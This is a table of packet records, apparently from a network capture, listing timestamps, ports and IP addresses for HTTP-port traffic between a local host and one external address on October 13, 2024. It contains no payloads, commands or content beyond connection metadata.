Oct 13, 2024 07:28:59.723087072 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.723108053 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.723130941 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.723145962 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.723145962 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.723153114 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.723169088 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.723171949 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.723193884 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.723201036 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.723220110 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.723239899 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.723953009 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.723973989 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.723994017 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.724006891 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.724013090 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.724030018 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.724030018 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.724061012 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.724085093 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.724088907 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.724106073 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.724117041 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.724131107 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.724158049 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.724829912 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.724849939 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.724872112 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.724883080 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.724883080 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.724894047 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.724910021 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.724916935 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.724927902 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.724957943 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.725713968 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.725733042 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.725754976 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.725771904 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.725771904 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.725784063 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.725794077 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.725799084 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.725831032 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.725835085 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.725858927 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.725862026 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.725882053 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.725898027 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.726598978 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.726619959 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.726639986 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.726651907 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.726654053 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.726679087 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.726679087 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.726691961 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.726700068 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.726742983 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.727473974 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.727494001 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.727515936 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.727530956 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.727530956 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.727538109 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.727552891 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.727560043 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.727574110 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.727582932 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.727605104 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.727626085 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.728212118 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.728230953 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.728252888 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.728270054 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.728271961 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.728270054 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.728292942 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.728296995 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.728312016 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.728319883 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.728328943 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.728338003 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.728374958 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.728374958 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.728985071 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.729000092 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.729026079 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.729046106 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.729048014 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.729048014 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.729065895 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.729068995 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.729088068 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.729089975 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.729120016 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.729130983 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.729130983 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.729157925 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.729861021 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.729880095 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.729902029 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.729912996 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.729948997 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.729948997 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.730125904 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.730146885 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.730181932 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.730386019 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.730431080 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.730449915 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.730472088 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.730488062 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.730488062 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.730493069 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.730509996 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.730516911 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.730529070 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.730580091 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.731050014 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.731069088 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.731091976 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.731107950 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.731107950 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.731113911 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.731131077 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.731136084 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.731151104 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.731158018 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.731175900 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.731182098 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.731194019 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.731215000 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.731869936 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.731888056 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.731909037 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.731925964 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.731928110 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.731925964 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.731949091 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.731950998 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.731969118 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.731973886 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.732000113 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.732013941 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.732013941 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.732034922 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.732692957 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.732713938 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.732750893 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.732752085 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.732903004 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.732928991 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.732954025 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.732985973 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.733202934 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.733222961 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.733237028 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.733262062 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.733264923 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.733264923 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.733283997 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.733292103 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.733292103 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.733316898 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.733788967 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.733808041 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.733830929 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.733839035 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.733851910 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.733861923 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.733863115 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.733875036 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.733886003 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.733922958 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.734287977 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.734307051 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.734328985 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.734354973 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.734354973 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.734389067 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.734633923 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.734652996 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.734674931 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.734688997 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.734688997 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.734690905 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.734714031 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.734771013 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.734771013 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.735024929 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.813024044 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.813074112 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.813126087 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.813194990 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.813194990 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.813194990 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.813291073 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.813319921 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.813352108 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.813352108 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.813498974 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.813514948 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.813558102 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.813558102 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.813749075 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.813769102 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.813786983 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.813807964 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.813808918 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.813812017 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.813831091 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.813838005 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.813849926 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.813884020 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.814426899 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.814450026 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.814469099 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.814483881 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.814485073 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.814491034 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.814507961 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.814512014 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.814526081 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.814534903 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.814548969 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.814555883 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.814572096 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.814580917 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.814589977 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.814632893 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.815284967 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.815305948 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.815329075 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.815339088 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.815339088 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.815351009 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.815365076 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.815373898 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.815418005 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.815418005 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.815738916 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.815771103 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.815794945 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.815794945 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.815814018 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.815817118 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.815840006 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.815844059 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.815844059 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.815866947 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.815877914 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.815895081 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.815916061 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.815936089 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.816696882 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.816718102 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.816741943 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.816749096 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.816770077 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.816771984 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.816771984 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.816796064 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.816811085 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.816823006 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.816838026 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.816850901 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.816859961 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.816878080 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.816901922 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.816905975 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.816924095 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.816943884 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.817540884 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.817564011 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.817598104 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.817598104 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.817605019 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.817631006 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.817655087 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.817657948 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.817676067 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.817686081 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.817699909 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.817713976 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.817728996 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.817743063 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.817755938 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.817784071 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.818541050 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.818599939 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.818599939 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.818625927 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.818651915 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.818659067 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.818659067 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.818679094 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.818694115 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.818706989 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.818712950 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.818734884 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.818748951 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.818763018 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.818773031 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.818808079 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.819353104 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.819417000 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.819473982 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.819519043 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.819523096 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.819544077 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.819559097 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.819569111 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.819582939 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.819597006 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.819612026 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.819626093 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.819653988 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.819658041 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.819674969 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.819698095 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.820394039 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.820422888 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.820447922 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.820460081 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.820460081 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.820475101 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.820481062 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.820503950 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.820518017 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.820532084 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.820557117 CEST	80	49161	104.168.7.25	192.168.2.22
